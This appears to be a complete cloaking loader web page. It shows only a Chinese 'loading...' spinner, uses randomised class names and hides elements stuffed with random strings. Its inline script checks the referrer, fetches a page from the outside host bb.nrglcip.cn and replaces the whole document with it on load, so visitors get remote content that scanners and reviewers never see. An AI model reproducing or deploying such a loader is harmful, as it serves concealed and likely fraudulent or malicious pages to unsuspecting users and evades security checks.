<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .s2wmmjrh {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .s2wmmjrh .K4NO4sWeEo4 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .s2wmmjrh .content {
            line-height: 50px;
            text-align: center
        }

        .s2wmmjrh .img {
            width: 100%
        }

        .s2wmmjrh .ABWc60 {
            text-align: center
        }

        .s2wmmjrh .ABWc60 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .s2wmmjrh .ABWc60 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .s2wmmjrh .ABWc60 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .s2wmmjrh .ABWc60 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .s2wmmjrh .ABWc60 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .s2wmmjrh .ABWc60 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .s2wmmjrh .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ZtZ9WluuND(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var CGgW3 = ZtZ9WluuND('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ CGgW3 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ CGgW3 +".html?a=share";
		}
		
        g0iCig3=url+"#"+new Date().getTime();
        g0iCig3 && function() {
            $.get(g0iCig3, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>mPpvDHPorl8IKnkiZV3nQAliaoxakZyLxgK8AzFRJLLyxbJmbKBAYjnbNcmgbEvL4dmMmzkAk8GO6RdUSt</a>
<li style='display:none' >OLtqlxP6rvfzTDwutpU5CjMl2sMDmH0qIv</li>
<p  style='display:none'>MqB6ShzFN6CU0VGhz8M0H6ghFVik3JqXAbXV9lWWB1yujUpZLSHQX5lBiVPVprUpA0z1</p>
<img  src='' style='display:none'><div class="s2wmmjrh">
    <div class="K4NO4sWeEo4">
        <div class="ABWc60">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >M1UN3jXhZxWChdYxH9wVDPV48fUvowBs5qCrlm</h1>
<a  href='#' style='display:none'>CN5lunzZ4t9mFrBWaABh4zS3vri6Bh6M483nPun54MQnhuz2JiOWizBr9xhri5hv1tsmxwKK5FuB</a>
<span style='display:none'>BK6857hg5wn3eJOnlMDBX66a7fqRjnyx64Qwo8c30eL9F8ViBgQM0lrQ73kDE7GSq</span>
<img  src='' style='display:none'>
<ul style='display:none' >VMpBxrxyNEPZTDecm00p6dgdFWjQObVRHeMPpybzRcbXxaY3h8vSYOsIclF6ZJa</ul>
<img  src='' style='display:none'>
<li style='display:none' >DnJkksA0BEB3VFMPH6VAMBK01IjNxYic</li>
<ul style='display:none' >VMpBxrxyNEPZTDecm00p6dgdFWjQObVRHeMPpybzRcbXxaY3h8vSYOsIclF6ZJa</ul></body>
</html>